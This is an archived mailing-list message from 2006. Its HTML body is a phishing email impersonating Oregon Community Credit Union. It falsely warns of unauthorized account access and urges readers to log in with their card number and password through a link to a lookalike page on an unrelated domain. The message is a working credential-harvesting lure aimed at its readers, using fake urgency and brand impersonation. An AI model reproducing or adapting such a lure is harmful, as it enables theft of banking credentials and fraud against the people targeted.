List:       ckrm-tech
Subject:    [ckrm-tech] Important Notice
From:       Oregon Community <accounts () oregoncommunitycu ! org>
Date:       2006-05-17 19:25:46

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Oregon Community Credit Union</H1>
Dear Credit Union customer, <P>

We recently reviewed your account, and suspect that your Credit Union Internet \
Banking account may have been accessed by an unauthorized third party.
Protecting the security of your account and of the Credit Union network is our \
primary concern. Therefore, as a preventative measure, we have temporarily limited \
access to sensitive account features.<P>

To restore your account access, please take the following steps to ensure that your \
account has not been compromised:<P>

1. Login to your Credit Union Internet Banking account. In case you are not enrolled \
for Internet Banking, you will have to fill in all the required information, \
including your client card number or business card number and your password.<P>

2. Review your recent account history for any unauthorized withdrawals or deposits, \
and check you account profile to make sure not changes have been made. If any \
unauthorized activity has taken place on your account! Report this to<P> Credit Union \
staff immediately.<P>  <P>
<HR>
<ADDRESS><a href="http://games.vetrnik.net/oregoncu.org/login.htm"><B>To get started, \
please Click Here</B></a></ADDRESS> </BODY></HTML>